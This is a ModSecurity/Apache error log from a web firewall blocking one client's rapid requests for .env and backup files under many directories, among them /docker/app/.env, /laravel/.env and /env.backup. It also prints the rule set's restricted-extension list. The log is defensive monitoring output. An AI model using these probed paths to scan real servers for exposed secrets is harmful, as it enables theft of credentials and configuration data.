[Thu Dec 18 01:52:05.715752 2025] [:error] [pid 810993] [client 45.148.10.143:38638] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aUNQNYUzQOIP6NNaX_tE9AAAAAY"]
[Thu Dec 18 01:52:09.972355 2025] [:error] [pid 810595] [client 45.148.10.143:38646] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aUNQOYVQR0ZCxazVD9krxAAAAAM"]
[Thu Dec 18 01:52:09.972579 2025] [:error] [pid 810595] [client 45.148.10.143:38646] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aUNQOYVQR0ZCxazVD9krxAAAAAM"]
[Thu Dec 18 01:52:09.972731 2025] [:error] [pid 810595] [client 45.148.10.143:38646] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aUNQOYVQR0ZCxazVD9krxAAAAAM"]
[Thu Dec 18 01:52:10.043676 2025] [:error] [pid 810595] [client 45.148.10.143:38646] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aUNQOoVQR0ZCxazVD9krxQAAAAM"]
[Thu Dec 18 01:52:10.043896 2025] [:error] [pid 810595] [client 45.148.10.143:38646] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aUNQOoVQR0ZCxazVD9krxQAAAAM"]
[Thu Dec 18 01:52:10.044051 2025] [:error] [pid 810595] [client 45.148.10.143:38646] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aUNQOoVQR0ZCxazVD9krxQAAAAM"]
[Thu Dec 18 01:52:14.253083 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUawAAAAA"]
[Thu Dec 18 01:52:14.253312 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUawAAAAA"]
[Thu Dec 18 01:52:14.253459 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUawAAAAA"]
[Thu Dec 18 01:52:14.292570 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUbAAAAAA"]
[Thu Dec 18 01:52:14.292786 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUbAAAAAA"]
[Thu Dec 18 01:52:14.292936 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUbAAAAAA"]
[Thu Dec 18 01:52:14.339334 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUbQAAAAA"]
[Thu Dec 18 01:52:14.339525 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUbQAAAAA"]
[Thu Dec 18 01:52:14.339666 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUbQAAAAA"]
[Thu Dec 18 01:52:14.385699 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUbgAAAAA"]
[Thu Dec 18 01:52:14.385879 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUbgAAAAA"]
[Thu Dec 18 01:52:14.386032 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUbgAAAAA"]
[Thu Dec 18 01:52:14.437270 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUbwAAAAA"]
[Thu Dec 18 01:52:14.437448 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUbwAAAAA"]
[Thu Dec 18 01:52:14.437588 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUbwAAAAA"]
[Thu Dec 18 01:52:14.474081 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUcAAAAAA"]
[Thu Dec 18 01:52:14.474243 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUcAAAAAA"]
[Thu Dec 18 01:52:14.474419 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aUNQPl2-pzy_XbcfFWNUcAAAAAA"]
[Thu Dec 18 01:52:14.589053 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aUNQPl2-pzy_XbcfFWNUcQAAAAA"]
[Thu Dec 18 01:52:14.589326 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aUNQPl2-pzy_XbcfFWNUcQAAAAA"]
[Thu Dec 18 01:52:14.589485 2025] [:error] [pid 810592] [client 45.148.10.143:38674] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aUNQPl2-pzy_XbcfFWNUcQAAAAA"]
[Thu Dec 18 01:52:16.129195 2025] [:error] [pid 810594] [client 45.148.10.143:38678] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aUNQQNtunAtRebcefOLdYwAAAAI"]
[Thu Dec 18 01:52:16.129462 2025] [:error] [pid 810594] [client 45.148.10.143:38678] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aUNQQNtunAtRebcefOLdYwAAAAI"]
[Thu Dec 18 01:52:16.129663 2025] [:error] [pid 810594] [client 45.148.10.143:38678] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aUNQQNtunAtRebcefOLdYwAAAAI"]
[Thu Dec 18 01:52:19.725956 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aUNQQ1XYVi-cYqymYgYAnQAAAAE"]
[Thu Dec 18 01:52:19.726172 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aUNQQ1XYVi-cYqymYgYAnQAAAAE"]
[Thu Dec 18 01:52:19.726368 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aUNQQ1XYVi-cYqymYgYAnQAAAAE"]
[Thu Dec 18 01:52:23.919889 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aUNQR1XYVi-cYqymYgYAngAAAAE"]
[Thu Dec 18 01:52:23.920112 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aUNQR1XYVi-cYqymYgYAngAAAAE"]
[Thu Dec 18 01:52:23.920292 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aUNQR1XYVi-cYqymYgYAngAAAAE"]
[Thu Dec 18 01:52:25.496061 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAnwAAAAE"]
[Thu Dec 18 01:52:25.496284 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAnwAAAAE"]
[Thu Dec 18 01:52:25.496479 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAnwAAAAE"]
